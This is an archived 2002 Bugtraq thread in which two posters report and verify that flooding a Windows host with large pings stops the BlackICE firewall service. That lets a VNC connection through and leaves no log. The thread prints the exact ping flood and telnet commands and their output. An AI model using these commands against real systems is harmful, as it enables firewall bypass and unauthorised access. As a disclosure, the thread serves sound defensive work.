RE: Black ICE Ping Vulnerability Side Note

From: Keith T. Morgan (keith.morganat_private)
Date: Wed Feb 06 2002 - 12:16:36 PST

Next message: Markus Hennig: "Astaro Response: Vulnerabilities in Astaro Security Linux 2.016"

Previous message: Stoic forty-four: "Black ICE Ping Vulnerability Side Note"
Maybe in reply to: Stoic forty-four: "Black ICE Ping Vulnerability Side Note"
Next in thread: Andrew McClymont: "Infecting the KaZaA network?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Verified.  I set BID (without ICE CAP) to it's paranoid setting, then did the following:

root@stonegate:/var/log# ping -f -s 65000 -c 4000 192.168.x.x
PING 192.168.x.x (192.168.x.x): 65000 data bytes
............................................................................................................................................
--- 192.168.x.x ping statistics ---
4310 packets transmitted, 4000 packets received, 7% packet loss
round-trip min/avg/max = 15.1/22.7/337.7 ms
root@stonegate:/var/log# telnet 192.168.x.x 5900
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
RFB 003.003


The system tray icon for BID switched to the blue eyeball shield with the red diagonal slash.  Service stopped.  I was able to connect to the VNC port.


-----Original Message-----
From: Stoic forty-four [mailto:stoic44at_private]
Sent: Wednesday, February 06, 2002 12:25 PM
To: bugtraqat_private
Subject: Black ICE Ping Vulnerability Side Note


When attempting to replicate the ping vulnerability
discovered by Matt Taylor a different outcome was
discovered. Rather than the large ping causing the
server to blue screen and/or hang the black ice
service was actually stopped thus allowing an intruder
to gain access to the host.

Testing consisted of Black ICE Agent version 3.1eaj
generated and deployed by ICE CAP version 3.1. The
agent was installed on a Dell 6450 running Windows
2000 SP2 and was running WinVNC 3.3 server in
application mode. The Black ICE agent generated was
set to use the Paranoid setting in order to prevent
any inbound connections. Using VNC viewer from my
dektop, I attempted to connect to the VNC server
running on the Dell and was blocked. I then issued the
command ping -l 65000 -t X.X.X.X, waited 5 seconds,
and attempted to connect to the VNC server again and
was successful. Upon connecting to the VNC server and
gaining access to the desktop, a Black ICE pop up
window appeared stating that the Black ICE service has
stopped would you like to start it? I chose to start
the service again which was successful but did not
disconnect my VNC session and as mentioned before did
not leave any logs in Black ICE showing anything had
occurred.

This information would more than likely affect
Enterpises that have deployed Black ICE agents and
have ICE CAP infrastructure deployed to manage them. I
would like to know if anyone else is able to replicate
this.

Brandon Young

__________________________________________________
Do You Yahoo!?
Send FREE Valentine eCards with Yahoo! Greetings!
http://greetings.yahoo.com

Next message: Markus Hennig: "Astaro Response: Vulnerabilities in Astaro Security Linux 2.016"
Previous message: Stoic forty-four: "Black ICE Ping Vulnerability Side Note"
Maybe in reply to: Stoic forty-four: "Black ICE Ping Vulnerability Side Note"
Next in thread: Andrew McClymont: "Infecting the KaZaA network?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 06 2002 - 12:28:10 PST